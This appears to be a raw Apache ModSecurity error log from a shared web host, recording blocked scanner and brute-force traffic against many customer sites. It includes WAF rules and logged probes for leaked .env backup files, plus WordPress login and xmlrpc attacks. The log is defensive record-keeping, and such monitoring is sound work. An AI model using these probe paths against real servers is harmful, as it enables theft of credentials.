[Tue May 26 18:43:01.455258 2026] [security2:error] [pid 1015481:tid 1015685] [client 5.255.122.176:2790] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "goadityaholidays.com"] [uri "/.env~"] [unique_id "ahWcXbQIKfWDMlp2INdmKwAAAVQ"]
[Tue May 26 18:43:01.456088 2026] [security2:error] [pid 1015481:tid 1015711] [client 5.255.122.176:2826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "goadityaholidays.com"] [uri "/.env.copy"] [unique_id "ahWcXbQIKfWDMlp2INdmNgAAAW4"]
[Tue May 26 18:43:01.456122 2026] [security2:error] [pid 1015481:tid 1015647] [client 5.255.122.176:2844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "goadityaholidays.com"] [uri "/.env.local.old"] [unique_id "ahWcXbQIKfWDMlp2INdmOwAAAS4"]
[Tue May 26 18:43:01.456385 2026] [security2:error] [pid 1015481:tid 1015629] [client 5.255.122.176:2894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "goadityaholidays.com"] [uri "/.env.local.swp"] [unique_id "ahWcXbQIKfWDMlp2INdmPQAAARw"]
[Tue May 26 18:43:01.456429 2026] [security2:error] [pid 1015481:tid 1015731] [client 5.255.122.176:2838] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "goadityaholidays.com"] [uri "/.env.local.bak"] [unique_id "ahWcXbQIKfWDMlp2INdmNwAAAYI"]
[Tue May 26 18:43:01.456551 2026] [security2:error] [pid 1015481:tid 1015631] [client 5.255.122.176:2956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "goadityaholidays.com"] [uri "/.env.production~"] [unique_id "ahWcXbQIKfWDMlp2INdmOgAAAR4"]
[Tue May 26 18:43:01.456903 2026] [security2:error] [pid 1015481:tid 1015723] [client 5.255.122.176:2758] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "goadityaholidays.com"] [uri "/.env.old"] [unique_id "ahWcXbQIKfWDMlp2INdmQAAAAXo"]
[Tue May 26 18:43:01.457594 2026] [security2:error] [pid 1015481:tid 1015711] [client 5.255.122.176:2970] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "goadityaholidays.com"] [uri "/.env.production.orig"] [unique_id "ahWcXbQIKfWDMlp2INdmQQAAAW4"]
[Tue May 26 18:43:02.680815 2026] [security2:error] [pid 1015481:tid 1015574] [remote 153.122.170.42:34122] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.170.122.153.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcXrQIKfWDMlp2INdmZgABcVw"]
[Tue May 26 18:43:03.350677 2026] [security2:error] [pid 1015481:tid 1015564] [remote 153.122.170.42:34122] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.170.122.153.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcX7QIKfWDMlp2INdmhAABNVI"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:43:03.586823 2026] [security2:error] [pid 1015481:tid 1015659] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcX7QIKfWDMlp2INdmgAAAATo"]
[Tue May 26 18:43:04.676315 2026] [autoindex:error] [pid 1015481:tid 1015660] [client 43.155.27.244:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://glorodbalsa.com
[Tue May 26 18:43:04.979274 2026] [security2:error] [pid 1015481:tid 1015619] [client 124.43.5.103:36837] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWcYLQIKfWDMlp2INdmtQAAARI"]
[Tue May 26 18:43:04.979431 2026] [security2:error] [pid 1015481:tid 1015619] [client 124.43.5.103:36837] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWcYLQIKfWDMlp2INdmtQAAARI"]
[Tue May 26 18:43:05.973615 2026] [security2:error] [pid 1015481:tid 1015724] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcYbQIKfWDMlp2INdmzAAAAXs"]
[Tue May 26 18:43:06.047393 2026] [security2:error] [pid 1015481:tid 1015545] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcYrQIKfWDMlp2INdm5gABCz8"]
[Tue May 26 18:43:06.047555 2026] [security2:error] [pid 1015481:tid 1015612] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcYrQIKfWDMlp2INdm5gABCz8"]
[Tue May 26 18:43:07.545966 2026] [security2:error] [pid 1015481:tid 1015600] [remote 123.30.233.13:55250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWcY7QIKfWDMlp2INdnCAABInY"]
[Tue May 26 18:43:09.308902 2026] [security2:error] [pid 1015481:tid 1015644] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcZLQIKfWDMlp2INdnNgAAASs"]
[Tue May 26 18:43:09.775753 2026] [security2:error] [pid 1015481:tid 1015732] [client 5.39.1.232:35794] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.pestcontroldelhi.co.in"] [uri "/robots.txt"] [unique_id "ahWcZbQIKfWDMlp2INdnTwAAAYM"]
[Tue May 26 18:43:09.775879 2026] [security2:error] [pid 1015481:tid 1015732] [client 5.39.1.232:35794] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.pestcontroldelhi.co.in"] [uri "/robots.txt"] [unique_id "ahWcZbQIKfWDMlp2INdnTwAAAYM"]
[Tue May 26 18:43:11.128808 2026] [security2:error] [pid 1015481:tid 1015626] [client 142.44.233.254:53488] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.pestcontroldelhi.co.in"] [uri "/"] [unique_id "ahWcZ7QIKfWDMlp2INdnbgAAARk"]
[Tue May 26 18:43:11.128943 2026] [security2:error] [pid 1015481:tid 1015626] [client 142.44.233.254:53488] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.pestcontroldelhi.co.in"] [uri "/"] [unique_id "ahWcZ7QIKfWDMlp2INdnbgAAARk"]
[Tue May 26 18:43:11.986768 2026] [security2:error] [pid 1015481:tid 1015695] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcZ7QIKfWDMlp2INdnfQAAAV4"]
[Tue May 26 18:43:12.678537 2026] [security2:error] [pid 1015481:tid 1015731] [client 85.208.96.210:61536] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-december/list/"] [unique_id "ahWcaLQIKfWDMlp2INdnkwAAAYI"]
[Tue May 26 18:43:12.678648 2026] [security2:error] [pid 1015481:tid 1015731] [client 85.208.96.210:61536] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-december/list/"] [unique_id "ahWcaLQIKfWDMlp2INdnkwAAAYI"]
[Tue May 26 18:43:13.092319 2026] [security2:error] [pid 1015481:tid 1015485] [remote 46.20.146.46:33704] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.146.20.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcaLQIKfWDMlp2INdnmwABdgM"]
[Tue May 26 18:43:13.435566 2026] [security2:error] [pid 1015481:tid 1015516] [remote 46.20.146.46:33704] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.146.20.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcabQIKfWDMlp2INdnrgABPCI"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:43:13.608905 2026] [security2:error] [pid 1015481:tid 1015612] [client 62.60.130.233:64157] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mail.creatorshouse.net.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWcabQIKfWDMlp2INdnsAAAAQs"], referer: https://www.reddit.com/
[Tue May 26 18:43:13.945173 2026] [security2:error] [pid 1015481:tid 1015727] [client 62.60.130.233:58483] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mail.creatorshouse.net.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWcabQIKfWDMlp2INdnvgAAAX4"], referer: https://www.facebook.com/
[Tue May 26 18:43:14.499958 2026] [security2:error] [pid 1015481:tid 1015728] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcarQIKfWDMlp2INdnxAAAAX8"]
[Tue May 26 18:43:15.421888 2026] [security2:error] [pid 1015481:tid 1015711] [client 124.43.5.103:37110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWca7QIKfWDMlp2INdn6wAAAW4"]
[Tue May 26 18:43:15.422032 2026] [security2:error] [pid 1015481:tid 1015711] [client 124.43.5.103:37110] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWca7QIKfWDMlp2INdn6wAAAW4"]
[Tue May 26 18:43:16.581960 2026] [security2:error] [pid 1015481:tid 1015620] [client 208.91.198.85:39380] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rehobothindependentcare.com"] [uri "/wp-cron.php"] [unique_id "ahWcbLQIKfWDMlp2INdoCwAAARM"]
[Tue May 26 18:43:16.787006 2026] [security2:error] [pid 1015481:tid 1015501] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcbLQIKfWDMlp2INdoEgABDBM"]
[Tue May 26 18:43:16.787204 2026] [security2:error] [pid 1015481:tid 1015613] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcbLQIKfWDMlp2INdoEgABDBM"]
[Tue May 26 18:43:17.142867 2026] [security2:error] [pid 1015481:tid 1015679] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcbLQIKfWDMlp2INdoEQAAAU4"]
[Tue May 26 18:43:17.590251 2026] [security2:error] [pid 1015481:tid 1015509] [remote 111.229.141.137:38252] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahWcbbQIKfWDMlp2INdoJgABShs"]
[Tue May 26 18:43:19.599201 2026] [security2:error] [pid 1015481:tid 1015639] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcb7QIKfWDMlp2INdoWQAAASY"]
[Tue May 26 18:43:21.674974 2026] [security2:error] [pid 1015481:tid 1015597] [remote 41.111.171.131:48746] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.171.111.41.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWccbQIKfWDMlp2INdojQABInM"]
[Tue May 26 18:43:21.961906 2026] [security2:error] [pid 1015481:tid 1015644] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWccbQIKfWDMlp2INdokwAAASs"]
[Tue May 26 18:43:22.446881 2026] [security2:error] [pid 1015481:tid 1015661] [client 74.7.230.31:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahWccrQIKfWDMlp2INdopQAAATw"]
[Tue May 26 18:43:22.446908 2026] [security2:error] [pid 1015481:tid 1015661] [client 74.7.230.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahWccrQIKfWDMlp2INdopQAAATw"]
[Tue May 26 18:43:22.460622 2026] [security2:error] [pid 1015481:tid 1015737] [client 74.7.230.31:49978] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/robots.txt"] [unique_id "ahWccrQIKfWDMlp2INdoowABiCE"]
[Tue May 26 18:43:24.874269 2026] [security2:error] [pid 1015481:tid 1015674] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcdLQIKfWDMlp2INdo1wAAAUk"]
[Tue May 26 18:43:25.057277 2026] [security2:error] [pid 1015481:tid 1015523] [remote 160.250.186.220:58142] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWcdLQIKfWDMlp2INdo5QABHCk"]
[Tue May 26 18:43:25.694948 2026] [security2:error] [pid 1015481:tid 1015486] [remote 46.62.185.67:33026] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.185.62.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahWcdbQIKfWDMlp2INdo_QABcAQ"]
[Tue May 26 18:43:25.849742 2026] [security2:error] [pid 1015481:tid 1015613] [client 76.111.100.197:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcdbQIKfWDMlp2INdo-gAAAQw"]
[Tue May 26 18:43:26.144072 2026] [security2:error] [pid 1015481:tid 1015668] [client 124.43.5.103:14397] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWcdrQIKfWDMlp2INdpEgAAAUM"]
[Tue May 26 18:43:26.144243 2026] [security2:error] [pid 1015481:tid 1015668] [client 124.43.5.103:14397] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWcdrQIKfWDMlp2INdpEgAAAUM"]
[Tue May 26 18:43:27.418142 2026] [security2:error] [pid 1015481:tid 1015700] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcdrQIKfWDMlp2INdpJAAAAWM"]
[Tue May 26 18:43:27.690690 2026] [security2:error] [pid 1015481:tid 1015525] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcd7QIKfWDMlp2INdpLAABXSs"]
[Tue May 26 18:43:27.691023 2026] [security2:error] [pid 1015481:tid 1015694] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcd7QIKfWDMlp2INdpLAABXSs"]
[Tue May 26 18:43:29.699643 2026] [security2:error] [pid 1015481:tid 1015687] [client 62.244.225.226:16643] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWcebQIKfWDMlp2INdpZgAAAVY"]
[Tue May 26 18:43:30.170866 2026] [security2:error] [pid 1015481:tid 1015732] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcebQIKfWDMlp2INdpcAAAAYM"]
[Tue May 26 18:43:32.235865 2026] [security2:error] [pid 1015481:tid 1015691] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWce7QIKfWDMlp2INdpswAAAVo"]
[Tue May 26 18:43:34.981904 2026] [security2:error] [pid 1015481:tid 1015631] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcfrQIKfWDMlp2INdqAAAAAR4"]
[Tue May 26 18:43:35.447645 2026] [security2:error] [pid 1015481:tid 1015721] [client 107.170.66.128:61219] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.jhonweb.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWcf7QIKfWDMlp2INdqHQAAAXg"]
[Tue May 26 18:43:37.377233 2026] [security2:error] [pid 1015481:tid 1015656] [client 124.43.5.103:37659] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWcgbQIKfWDMlp2INdqRwAAATc"]
[Tue May 26 18:43:37.377410 2026] [security2:error] [pid 1015481:tid 1015656] [client 124.43.5.103:37659] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWcgbQIKfWDMlp2INdqRwAAATc"]
[Tue May 26 18:43:37.837997 2026] [security2:error] [pid 1015481:tid 1015633] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcgbQIKfWDMlp2INdqTQAAASA"]
